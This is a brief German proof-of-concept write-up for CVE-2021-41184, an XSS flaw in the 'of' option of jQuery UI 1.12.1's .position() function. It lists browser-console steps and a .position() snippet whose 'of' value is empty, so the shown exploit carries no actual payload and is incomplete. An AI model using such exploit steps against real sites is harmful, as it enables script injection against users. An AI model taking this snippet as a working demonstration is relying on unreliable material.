
Proof-of-Concept-Exploit für CVE-2021-41184, eine Cross-Site-Scripting (XSS)-Schwachstelle in der .position()-Utility von jQuery UI, die Version 1.12.1 betrifft.
Exploit Medium CVE-2021-41184 XSS in der of Option der .position()-Hilfsfunktion
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Proof of Concept---------------------------------------------------------------
URL öffnen
Inspektion öffnen
Suche nach einer ID in den Seitenelementen
3.1 #ID
Gehe zum Konsolen-Tab
Skript mit der unter Punkt 3.1 ausgewählten ID injizieren
5.1 Skript
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});